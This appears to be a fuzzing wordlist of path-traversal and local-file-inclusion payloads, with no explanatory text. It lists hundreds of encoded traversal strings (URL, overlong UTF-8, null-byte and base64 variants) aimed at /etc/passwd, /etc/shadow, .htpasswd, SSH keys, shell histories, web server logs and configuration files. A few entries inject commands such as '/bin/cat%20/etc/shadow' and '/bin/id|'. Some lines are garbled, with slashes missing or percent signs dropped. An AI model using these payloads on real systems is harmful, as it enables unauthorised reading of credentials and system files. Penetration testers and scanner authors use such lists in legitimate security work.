/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
=3D “/..” . “%2f..
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
admin/access_log
/admin/install.php
../../../administrator/inbox
/apache2/logs/access_log
/apache2/logs/access.log
/apache2/logs/error_log
/apache2/logs/error.log
/apache/logs/access_log
/apache/logs/access.log
../../../../../apache/logs/access.log
../../../../apache/logs/access.log
../../../apache/logs/access.log
../../apache/logs/access.log
../apache/logs/access.log
/apache/logs/error_log
/apache/logs/error.log
../../../../../apache/logs/error.log
../../../../apache/logs/error.log
../../../apache/logs/error.log
../../apache/logs/error.log
../apache/logs/error.log
/apachephpphp.ini
'/bin/cat%20/etc/passwd'
'/bin/cat%20/etc/shadow'
/.bash_history
/.bash_profile
/.bashrc
/../../../../../../../../bin/id|
/bin/php.ini
/boot/grub/grub.conf
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini
/..../..../..../..../..../..../boot.ini
/../../../../../../boot.ini
..//..//..//..//..//boot.ini
../../../../../../../../../../../../boot.ini
../../boot.ini
..../..../..../..../boot.ini
..../..../boot.ini
....................oot.ini
....................oot.ini
/../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini%00
....................oot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
c:apachelogsaccess.log
c:apachelogserror.log
c:AppServMySQL
C:/boot.ini
C:oot.ini
/C:/inetpub/ftproot/
C:/inetpub/wwwroot/global.asa
C:inetpubwwwrootglobal.asa
c:inetpubwwwrootindex.asp
/config.asp
../config.asp
config.asp
../config.inc.php
config.inc.php
../config.js
config.js
_config.php
../_config.php
../config.php
config.php
../_config.php%00
../../../../../../../../conf/server.xml
/core/config.php
/C:Program Files
c:Program FilesApache GroupApachelogsaccess.log
c:Program FilesApache GroupApachelogserror.log
/.cshrc
c:System32Inetsrvmetabase.xml
c:WINDOWS/system32/
d:AppServMySQL
database.asp
database.js
database.php
data.php
dbase.php a
db.php
../../../../../../../dev
/D:Program Files
d:System32Inetsrvmetabase.xml
/etc/apache2/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apt/sources.list
/etc/chrootUsers
/etc/crontab
/etc/defaultdomain
/etc/default/passwd
/etc/defaultrouter
/etc/fstab
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.ce1
/etc/hostname.ce2
/etc/hostname.ce3
/etc/hostname.dcelx0
/etc/hostname.dcelx1
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
/etc/hosts
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
../../../../../etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/http/httpd.conf
/etc/inetd.conf
/etc/init.d/apache
/etc/init.d/apache2
/etc/issue
/etc/logrotate.d/ftp
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/master.passwd
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/netconfig
/etc/nsswitch.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/./././././././././././etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..../..../..../..../..../..../etc/passwd
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
....................etcpasswd
../../../../../../etc/passwd
....................etcpasswd
etc/passwd
/etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
....................etcpasswd%00
....................etcpasswd%00
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../etc/passwd&=%3C%3C%3C%3C
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/cgi/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysqli.ini
/etc/php.d/mysql.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/postfix/mydomains
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/release
/etc/resolv.conf
/etc/rpc
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/./././././././././././etc/shadow
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/..../..../..../..../..../..../etc/shadow
/etc/shadow
../../../../../../../../../../../../etc/shadow
....................etcshadow
../../../../../../etc/shadow
....................etcshadow
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
....................etcshadow%00
....................etcshadow%00
etc/shadow%00
/etc/ssh/sshd_config
/etc/sudoers
/etc/syslog.conf
/etc/syslogd.conf
/etc/system
/etc/updatedb.conf
/etc/utmp
/etc/vfstab
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/.forward
/home2instableapachephp.ini
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/homeinstableapachephp.ini
/.htpasswd
.htpasswd
../.htpasswd
../install.php
install.php
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
/log/miscDir/accesslog
/.logout
/logs/access_log
/logs/access.log
../../../../../logs/access.log
../../../../logs/access.log
../../../logs/access.log
../../logs/access.log
../logs/access.log
/logs/error_log
/logs/error.log
../../../../../logs/error.log
../../../../logs/error.log
../../../logs/error.log
../../logs/error.log
../logs/error.log
/logs/pure-ftpd.log
/master.passwd
member/.htpasswd
members/.htpasswd
/.netrc
/NetServerinstableapachephp.ini
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
.pass
../.pass
pass.dat
passwd
/.passwd
.passwd
../.passwd
passwd.dat
/php4php.ini
/php5php.ini
/phpphp.ini
/PHPphp.ini
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/proc/cpuinfo
/proc/interrupts
/proc/loadavg
/proc/meminfo
/proc/mounts
/proc/net/arp
/proc/net/dev
/proc/net/route
/proc/net/tcp
/proc/partitions
/proc/self/cmdline
/proc/self/envron
/proc/version
/.profile
/Program FilesApache GroupApache2confhttpd.conf
/Program FilesApache GroupApacheconfhttpd.conf
/Program FilesApache GroupApachelogsaccess.log
/Program FilesApache GroupApachelogserror.log
/Program Filesxamppapacheconfhttpd.conf
/../../../../pswd
/.rhosts
/root/.bash_history
/root/.bash_logut
root/.htpasswd
/root/.ksh_history
/root/.Xauthority
/.sh_history
/.shosts
/.ssh/authorized_keys
user/.htpasswd
../users.db.php
users.db.php
users/.htpasswd
/usr/apache2/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access. log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../usr/local/apache/logs/error_log
../../../../../usr/local/apache/logs/error.log
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/local/Zend/etc/php.ini
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/loginlog
/var/adm/log/xferlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/SYSLOG
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/X0msgs
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mlocate/mlocate.db
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/access_log
/var/log/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../var/log/access_log
/var/log/acct
/var/log/apache2/access_log
/var/log/apache2/access.log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
../../../../../var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth
/var/log/authlog
/var/log/auth.log
/var/log/boot.log
/var/log/cron.log
/var/log/dmesg
/var/log/error_log
/var/log/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
../../../../../var/log/error_log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd/
/var/log/httpd/access_log
/var/log/httpd/access.log
../../../../../var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpd/error.log
../../../../../var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysqld.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/nginx/access_log
/var/log/nginx/access.log
../../../../../../../var/log/nginx/access_log
../../../../../../../var/log/nginx/access.log
../../../../../var/log/nginx/access_log
../../../../../var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log
../../../../../../../var/log/nginx/error_log
../../../../../../../var/log/nginx/error.log
../../../../../var/log/nginx/error_log
../../../../../var/log/nginx/error.log
/var/log/poplog
/var/log/POPlog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/httpd.pid
/var/run/mysqld/mysqld.pid
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/html/.htaccess
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
/../../var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
../../../../../var/www/logs/error.log
/var/www/sitename/htdocs/
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/web/conf/php.ini
/WINDOWSphp.ini
../../windows/win.ini
/WINNTphp.ini
/............winntwin.ini
/www/logs/proftpd.system.log
/xamppapacheinphp.ini
/.Xauthority
..2fapache2flogs2ferror.log
..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2fetc2fpasswd
..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
L2V0Yy9tYXN0ZXIucGFzc3dk
L21hc3Rlci5wYXNzd2Q=
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
